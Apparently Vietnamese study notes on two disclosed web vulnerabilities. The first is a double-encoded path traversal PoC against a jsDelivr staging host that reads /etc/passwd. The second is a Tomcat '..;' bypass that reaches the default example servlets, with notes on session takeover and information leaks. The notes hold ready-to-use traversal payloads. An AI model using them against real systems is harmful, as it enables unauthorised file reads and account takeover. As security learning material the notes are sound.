Directory Traversal at http://staging.jsdelivr.net/ path-traversal
Attacker tìm thấy lỗ hổng path traversal thông qua PoC sau:
http://staging.jsdelivr.net//..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwdDecode lần đầu tiên:
http://staging.jsdelivr.net//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwdDecode lần thứ 2:
http://staging.jsdelivr.net//................/etc/passwdKý tự %c0 và %af đều là các ký tự không thể in ra được nên có thể chúng sẽ bị normalize và bị bỏ đi bởi server.‘
..; Bypass Leading to Tomcat Scripts path-traversal broken-access-control
Bằng cách sử dụng kỹ thuật ..;, attacker có thể bypass được cơ chế bảo vệ của Tomcat và truy cập vào các example/test scripts nằm ở thư mục /examples (là thư mục mặc định của Tomcat) trong môi trường test. Các file ở đó chứa rất nhiều example servlets và JSP.
Cite
[ https://█████████/..;/examples/servlets/servlet/SessionExample] | Will lead to Session Manipulation and potential Account Takeover. Because the session is global this servlet poses a big security risk as an attacker can potentially become an administrator by manipulating its session.
[https://████████/..;/examples/servlets/servlet/CookieExample] | Insecure Cookie Handling
[https://████████/..;/examples/servlets/] | Source Code Disclosure and an “Execute” option
[https://███████/..;/examples/servlets/servlet/RequestHeaderExample] | Internal IP disclosure
Đặc biệt, file /examples/servlets/servlet/SessionExample cho phép thao túng session và có thể giúp cho attacker trở thành admin.